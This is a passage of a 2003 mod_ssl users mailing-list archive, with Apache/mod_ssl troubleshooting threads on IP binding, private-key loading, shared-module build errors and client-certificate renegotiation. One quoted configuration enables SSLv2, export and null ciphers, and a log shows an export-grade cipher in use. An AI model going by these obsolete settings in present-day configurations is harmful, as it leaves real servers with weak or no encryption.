> > > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > > #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> > > #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> > > #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> > > #
> > >
> > > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars
+StrictRequire
> > > 
> > >     SSLOptions +StdEnvVars
> > > 
> > > 
> > >     SSLOptions +StdEnvVars
> > > 
> > >
> > > SetEnvIf User-Agent ".*MSIE.*" \
> > >          nokeepalive ssl-unclean-shutdown \
> > >          downgrade-1.0 force-response-1.0
> > >
> > > CustomLog /var/log/httpd/ssl_request_log \
> > >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > >
> > > 
> > >
> > > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
Mod_SSL
> > > 2.8.10 on a SuSE 8.1 box.
> > >
> > > Thanks,
> > > -Andrew
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> >
> >
>
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
>
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
>
> testing, only testing, and damn good at it too!
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 22:57:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 27A5C2AA020; Thu,  6 Mar 2003 22:57:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from redback.adroit.net (redback.adroit.net [203.89.254.243])
	by master.modssl.org (Postfix) with ESMTP id 256312AA015
	for ; Thu,  6 Mar 2003 22:57:16 +0100 (CET)
Received: from adroit.net ([202.129.84.50])
	by redback.adroit.net (8.12.3/8.12.3/Debian-5) with ESMTP id h26LvC8u027579
	for ; Fri, 7 Mar 2003 08:57:13 +1100
Message-ID: <3E67C3AB.3040008@adroit.net>
Date: Fri, 07 Mar 2003 08:54:51 +1100
From: Terry Kerr 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.6) Gecko/20011120
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
References: <3E66EC7C.4000002@adroit.net> <20030306092003.M41569@cus.org.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Terry Kerr 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mark,

Thanks for you suggestion, but whenever I try to put

Listen my.ip.address:443 (with the correct ip address ;-)

My http or https server does start at all on any port.  The log error I get is

[crit] (98)Address already in use: make_sock: could not bind to address 
203.89.254.243 port 443

But I don't get a similar error for port 80, so I don't know why it also doesn't 
start.

I also have Listen ip.address:80 defined, and have a NameVirtualHost ip.address 
defined.  I have tried many different combinations of name based and ip based 
virtual hosting, but https always binds to all IP's.  As soon as I put the 
Listen ip.address:443, I get the log error above and no servers start.

terry





Mark Boddington wrote:

> Hi Terry,
> 
> Perhaps your directives are being overridden in a "IfDefine SSL" or
> "IfModule SSL" block ? Listen IP:Port does work, works for me. Do you
> have the following in your config ?
> 
> Listen my.ip.address:443
> ...
> NameVirtualHost my.ip.address:443
> ...
> 
> ...
> 
> 
> Cheers,
> 
> Mark
> 
> 
> On Thu, 6 Mar 2003, Terry Kerr wrote:
> 
> 
>>Hi,
>>
>>I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
>>
>>The system has two IP's, and I only wish for apache to start on ports 80 and 443
>>on one of those IPs.  I am using named based virtual hosting for many sites on
>>the system for http, and have just one virtual host setup for https on port 443.
>>  The problem that I am having is that I cannot stop mod_ssl from binding to
>>port 443 on both the IP's on my system.  I have tried every possible combination
>>of Listen, BindAddress, and Port, and have managed to prevent http from starting
>>on all IP's, but https still starts on all IPs.  Is there any way to stop this?
>>
>>
> ddD> Will I need to start two seperate servers, one serving http only, and
> one
> 
>>serving https only?  If I was to do this, I may as well go back to using
>>apache-ssl which is the default installation on debian anyway.
>>
>>Thanks in advance
>>
>>terry
>>
>>--
>>Terry Kerr (terry@adroit.net)
>>Adroit Internet Solutions (www.adroit.net)
>>Phone: +61 3 9563 4461
>>Fax: +61 3 9563 3856
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 



-- 
Terry Kerr (terry@adroit.net)
Adroit Internet Solutions (www.adroit.net)
Phone: +61 3 9563 4461
Fax: +61 3 9563 3856

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 23:05:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2FD72AA020; Thu,  6 Mar 2003 23:05:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (dav44.law15.hotmail.com [64.4.22.16])
	by master.modssl.org (Postfix) with ESMTP id 9ECC52AA015
	for ; Thu,  6 Mar 2003 23:05:54 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 6 Mar 2003 13:54:39 -0800
X-Originating-IP: [66.46.24.157]
From: "apachep2" 
To: 
Subject: undefined symbol: X509_free when apachectl startssl
Date: Thu, 6 Mar 2003 16:55:03 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_008D_01C2E401.22384B10"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
X-OriginalArrivalTime: 06 Mar 2003 21:54:39.0271 (UTC) FILETIME=[FC50D370:01C2E42A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "apachep2" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_008D_01C2E401.22384B10
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Having searched through the archive, I could not find a solution to the
above error. This error only occurs when I build mod_ssl as dynamic
linked module. When I have done is

 

-          download zlib-1.1.4 source and build it --shared
--prefix=/usr

-          download openssl-0.9.7a source and build it

-          download httpd-2.0.44 source and build it ./configure ..
--enable-ssl=shared -with-ssl=/usr/local/ssl

 

My OS is Red Hat 7.2.

 

 


------=_NextPart_000_008D_01C2E401.22384B10
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















Having searched through the archive, I could not find =
a
solution to the above error. This error only occurs when I build mod_ssl =
as
dynamic linked module. When I have done is



 



-        =
; 
download zlib-1.1.4 source and build it --shared =
--prefix=3D/usr



-        =
; 
download openssl-0.9.7a source and build it



-        =
; 
download httpd-2.0.44 source and build it ./configure …. =
--enable-ssl=3Dshared
–with-ssl=3D/usr/local/ssl



 



My OS is Red Hat 7.2.



 



 









------=_NextPart_000_008D_01C2E401.22384B10--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 23:06:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 840922AA01A; Thu,  6 Mar 2003 23:06:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 3F0662AA02C
	for ; Thu,  6 Mar 2003 23:06:35 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id RAA06861
	for ; Thu, 6 Mar 2003 17:04:41 -0500
Date: Thu, 6 Mar 2003 17:04:41 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
In-Reply-To: <3E67C3AB.3040008@adroit.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


it sounds like perhaps yer http.conf file have perhaps more then one
listen directive, perhaps outside the  directives.  Might
try grepping the file for listen and see what comes up.  or, better yet,
egrepping for bind|listen|etc...

thanks,

Ron DuFresne

On Fri, 7 Mar 2003, Terry Kerr wrote:

> Mark,
> 
> Thanks for you suggestion, but whenever I try to put
> 
> Listen my.ip.address:443 (with the correct ip address ;-)
> 
> My http or https server does start at all on any port.  The log error I get is
> 
> [crit] (98)Address already in use: make_sock: could not bind to address 
> 203.89.254.243 port 443
> 
> But I don't get a similar error for port 80, so I don't know why it also doesn't 
> start.
> 
> I also have Listen ip.address:80 defined, and have a NameVirtualHost ip.address 
> defined.  I have tried many different combinations of name based and ip based 
> virtual hosting, but https always binds to all IP's.  As soon as I put the 
> Listen ip.address:443, I get the log error above and no servers start.
> 
> terry
> 
> 
> 
> 
> 
> Mark Boddington wrote:
> 
> > Hi Terry,
> > 
> > Perhaps your directives are being overridden in a "IfDefine SSL" or
> > "IfModule SSL" block ? Listen IP:Port does work, works for me. Do you
> > have the following in your config ?
> > 
> > Listen my.ip.address:443
> > ...
> > NameVirtualHost my.ip.address:443
> > ...
> > 
> > ...
> > 
> > 
> > Cheers,
> > 
> > Mark
> > 
> > 
> > On Thu, 6 Mar 2003, Terry Kerr wrote:
> > 
> > 
> >>Hi,
> >>
> >>I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
> >>
> >>The system has two IP's, and I only wish for apache to start on ports 80 and 443
> >>on one of those IPs.  I am using named based virtual hosting for many sites on
> >>the system for http, and have just one virtual host setup for https on port 443.
> >>  The problem that I am having is that I cannot stop mod_ssl from binding to
> >>port 443 on both the IP's on my system.  I have tried every possible combination
> >>of Listen, BindAddress, and Port, and have managed to prevent http from starting
> >>on all IP's, but https still starts on all IPs.  Is there any way to stop this?
> >>
> >>
> > ddD> Will I need to start two seperate servers, one serving http only, and
> > one
> > 
> >>serving https only?  If I was to do this, I may as well go back to using
> >>apache-ssl which is the default installation on debian anyway.
> >>
> >>Thanks in advance
> >>
> >>terry
> >>
> >>--
> >>Terry Kerr (terry@adroit.net)
> >>Adroit Internet Solutions (www.adroit.net)
> >>Phone: +61 3 9563 4461
> >>Fax: +61 3 9563 3856
> >>
> >>______________________________________________________________________
> >>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>User Support Mailing List                      modssl-users@modssl.org
> >>Automated List Manager                            majordomo@modssl.org
> >>
> >>
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> 
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 23:13:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B5ACE2AA020; Thu,  6 Mar 2003 23:13:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id 61F062AA01A
	for ; Thu,  6 Mar 2003 23:13:48 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Thu, 6 Mar 2003 14:58:45 -0500
Message-ID: <00b101c2e41b$82407ef0$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <200303071542.00371.aputnam@pelathe.org> <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k> <200303071620.31307.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Thu, 6 Mar 2003 15:03:51 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

was the domain moved over to your server, or did you generate key/csr/crt?

I'm having the same difficulty with one where the domain, cert and key were
transferred; all my others work properly...

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Friday, March 07, 2003 5:20 PM
Subject: Re: private key not found


The permissions for the server.crt file are rw-r--r-- but it still cannot
find
the Private Key.

On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> Please check the permissions on your private key.  They should be readable
> only by owner (400)
>
> (knee-jerk first guess reaction)
>
> Best of luck
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 3:42 PM
> Subject: private key not found
>
>
> I'm trying to get mod_ssl to work on my server, but each time I try to
> restart
> apache with mod_ssl activated, it gives me this error:
>
> /etc/init.d/apache start returned 7 (Program is not running.)
> Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> Phrase Dialog)
> Some of your private key files are encrypted for security reasons.
> In order to read them you have to provide us with the pass phrases.
>
> Server matrix.pelathe.org:443 (RSA)
> Enter pass phrase:
> Apache:mod_ssl:Error: Private key not found.
> **Stopped
> stty: standard input: Inappropriate ioctl for device
> ..failed
>
> What I don't understand is how it can't find the Private key. The
> SSLCertificateKeyFile path in httpd.conf matches the location of the key
in
> my directory. Isn't the SSLCertificateKeyFile the Private Key path?
>
> I'm including the Virtual Host code (sans the explination text and a
> passkey).
> I'm very new to this so I won't be surprised if there is a glaring error
in
> here that I missed...
>
> 
>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
>
> SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
>
> SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
>
> #SSLCACertificatePath /etc/httpd/ssl.crt
> SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
>
> SSLCARevocationPath /etc/httpd/ssl.crl
> #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
>
> SSLVerifyClient require
> SSLVerifyDepth  10
>
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> #
>
> #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_SSL
> 2.8.10 on a SuSE 8.1 box.
>
> Thanks,
> -Andrew
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 23:18:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3D36C2AA020; Thu,  6 Mar 2003 23:18:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from redback.adroit.net (redback.adroit.net [203.89.254.243])
	by master.modssl.org (Postfix) with ESMTP id 7933E2AA015
	for ; Thu,  6 Mar 2003 23:18:57 +0100 (CET)
Received: from adroit.net ([202.129.84.50])
	by redback.adroit.net (8.12.3/8.12.3/Debian-5) with ESMTP id h26MIs8u029024
	for ; Fri, 7 Mar 2003 09:18:54 +1100
Message-ID: <3E67C8C0.90206@adroit.net>
Date: Fri, 07 Mar 2003 09:16:32 +1100
From: Terry Kerr 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.6) Gecko/20011120
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: stop apache/mod_ssl binding to all IP's.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Terry Kerr 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

my apologies...I am an idiot...I found the other Listen directive ;-)

terry

R. DuFresne wrote:

> it sounds like perhaps yer http.conf file have perhaps more then one
> listen directive, perhaps outside the  directives.  Might
> try grepping the file for listen and see what comes up.  or, better yet,
> egrepping for bind|listen|etc...
> 
> thanks,
> 
> Ron DuFresne
> 
> On Fri, 7 Mar 2003, Terry Kerr wrote:
> 
> 
>>Mark,
>>
>>Thanks for you suggestion, but whenever I try to put
>>
>>Listen my.ip.address:443 (with the correct ip address ;-)
>>
>>My http or https server does start at all on any port.  The log error I get is
>>
>>[crit] (98)Address already in use: make_sock: could not bind to address 
>>203.89.254.243 port 443
>>
>>But I don't get a similar error for port 80, so I don't know why it also doesn't 
>>start.
>>
>>I also have Listen ip.address:80 defined, and have a NameVirtualHost ip.address 
>>defined.  I have tried many different combinations of name based and ip based 
>>virtual hosting, but https always binds to all IP's.  As soon as I put the 
>>Listen ip.address:443, I get the log error above and no servers start.
>>
>>terry
>>
>>
>>
>>
>>
>>Mark Boddington wrote:
>>
>>
>>>Hi Terry,
>>>
>>>Perhaps your directives are being overridden in a "IfDefine SSL" or
>>>"IfModule SSL" block ? Listen IP:Port does work, works for me. Do you
>>>have the following in your config ?
>>>
>>>Listen my.ip.address:443
>>>...
>>>NameVirtualHost my.ip.address:443
>>>...
>>>
>>>...
>>>
>>>
>>>Cheers,
>>>
>>>Mark
>>>
>>>
>>>On Thu, 6 Mar 2003, Terry Kerr wrote:
>>>
>>>
>>>
>>>>Hi,
>>>>
>>>>I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.
>>>>
>>>>The system has two IP's, and I only wish for apache to start on ports 80 and 443
>>>>on one of those IPs.  I am using named based virtual hosting for many sites on
>>>>the system for http, and have just one virtual host setup for https on port 443.
>>>> The problem that I am having is that I cannot stop mod_ssl from binding to
>>>>port 443 on both the IP's on my system.  I have tried every possible combination
>>>>of Listen, BindAddress, and Port, and have managed to prevent http from starting
>>>>on all IP's, but https still starts on all IPs.  Is there any way to stop this?
>>>>
>>>>
>>>>
>>>ddD> Will I need to start two seperate servers, one serving http only, and
>>>one
>>>
>>>
>>>>serving https only?  If I was to do this, I may as well go back to using
>>>>apache-ssl which is the default installation on debian anyway.
>>>>
>>>>Thanks in advance
>>>>
>>>>terry
>>>>
>>>>--
>>>>Terry Kerr (terry@adroit.net)
>>>>Adroit Internet Solutions (www.adroit.net)
>>>>Phone: +61 3 9563 4461
>>>>Fax: +61 3 9563 3856
>>>>
>>>>______________________________________________________________________
>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>>
>>>>
>>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>
>>
>>
> 



-- 
Terry Kerr (terry@adroit.net)
Adroit Internet Solutions (www.adroit.net)
Phone: +61 3 9563 4461
Fax: +61 3 9563 3856

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 08:42:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DAF312AA027; Fri,  7 Mar 2003 08:42:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lytehouse.net (209-183-162-200.x.newroadstelecom.net [209.183.162.200])
	by master.modssl.org (Postfix) with ESMTP id C27C72AA01F
	for ; Fri,  7 Mar 2003 08:42:47 +0100 (CET)
Received: from smtp.lytehouse.net (smtp.lytehouse.net [209.183.162.200])
	by lytehouse.net (8.12.5/8.12.5) with ESMTP id h277gjea020445
	for ; Fri, 7 Mar 2003 01:42:45 -0600
Date: Fri, 7 Mar 2003 01:42:36 -0600 (CST)
From: Ted Rolle 
X-X-Sender: ted@localhost.localdomain
To: Mod-SSL Users Mailing List 
Subject: Shared mod_ssl problems
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rolle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Justin E hit the nail on the head!  I was writing my tale of woe about
this problem (it's still below for your edification).  As I see it,
there's a missing link -- OpenSSL -- which isn't brought in to resolve
these call references.
If mod_ssl can be smartened up to use the ldconfig mechanism -- if it
doesn't already -- this might be a solution.

For background, I've been a member of this list a whole two hours...



I too, am having this problem.

Here's my Apache configuration:

    ./configure \
--enable-mods-shared=all \
--enable-ipv6=shared \
--enable-auth_ldap=shared \
--enable-ssl=shared \
--with-ssl=/usr/local/bin/

Here's my OpenSSL configuration:

 ./config                           \
    --prefix=/usr/local             \
    shared                          \
    zlib-dynamic

[root@dungeness bin]# ./apachectl startssl
Syntax error on line 262 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_ssl.so into server:
/usr/local/apache2/modules/mod_ssl.so: undefined symbol: X509_free
[root@dungeness bin]#

The message indicates that mod_ssl.so can't find X509_free, no?

X509_free is in /usr/local/lib/libssl.so.0.9.7.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 14:19:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 819A52AA02C; Fri,  7 Mar 2003 14:19:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gavia.izoard.com (izoard.com [64.3.36.44])
	by master.modssl.org (Postfix) with ESMTP id A01CC2AA01F
	for ; Fri,  7 Mar 2003 14:19:57 +0100 (CET)
Received: from mortirolo.izoard.com ([192.168.0.50] helo=izoard.com)
	by gavia.izoard.com with smtp (Exim 3.35 #1 (Debian))
	id 18rHlT-0004Rg-00; Fri, 07 Mar 2003 08:19:55 -0500
Received: from 199.196.144.16
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Fri, 7 Mar 2003 08:19:55 -0500 (EST)
Message-ID: <47527.199.196.144.16.1047043195.squirrel@www.izoard.com>
Date: Fri, 7 Mar 2003 08:19:55 -0500 (EST)
Subject: mod_ssl/mod_jk failure with client authentication on
From: "Aaron Stromas" 
To: , 
X-Mailer: SquirrelMail (version 1.2.0 [rc2])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Stromas" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I apologise for cross-posting - I'm really not sure which component is at
fault, looks like mod_ssl but possibly mod_jk. BTW, is there a list (or some
other venue) dedicated to mod_jk?

My environment is Apache 1.3.22, mod_ssl 2.8.5, OpenSSL 0.9.6b, tomcat 4.0.3.
I have a servlet mounted like this

JkMount /app/servlet/* ajp13
JkMount /app/*.jsp ajp13

        SSLVerifyClient require
        SSLVerifyDepth  4


When SSLVerifyClient is set to 'none' all works fine, but when I set it as
above, to 'require', it seems that the SSL connection is repetedly
renegotiated. The mod_jk log stop at this line (I edited out log entry
headers for clarity):

Attempting to map URI '/app/servlet/ApplicationProxyServlet'
jk_uri_worker_map_t::map_uri_to_worker, Found a context match ajp13 ->
/app/servlet/

whilst the ssl engine log shows this
Connection to child 3 established (server www-sps.sps.fms.treas.gov:443,
client 164.95.119.43)
Seeding PRNG with 1160 bytes of entropy
OpenSSL: Handshake: start
OpenSSL: Loop: before/accept initialization
Inter-Process Session Cache: request=GET status=FOUND
id=7A2A7121DDC60F144CA9F233A19E7BD7D88F0DCA06AEB588165EB9F01CA276DE (session
reuse)
OpenSSL: Loop: SSLv3 read client hello A
OpenSSL: Loop: SSLv3 write server hello A
OpenSSL: Loop: SSLv3 write change cipher spec A
OpenSSL: Loop: SSLv3 write finished A
OpenSSL: Loop: SSLv3 flush data
OpenSSL: Loop: SSLv3 read finished A
OpenSSL: Handshake: done
Connection: Client IP: 164.95.119.43, Protocol: SSLv3, Cipher:
EXP1024-RC4-SHA (56/128 bits)
Initial (No.1) HTTPS request received for child 3 (server
www-sps.sps.fms.treas.gov:443)
OpenSSL: Write: SSL negotiation finished successfully
Connection to child 3 closed with standard shutdown (server
www-sps.sps.fms.treas.gov:443, client 164.95.119.43)
Connection to child 4 established (server www-sps.sps.fms.treas.gov:443,
client 164.95.119.43)
Seeding PRNG with 1160 bytes of entropy
OpenSSL: Handshake: start
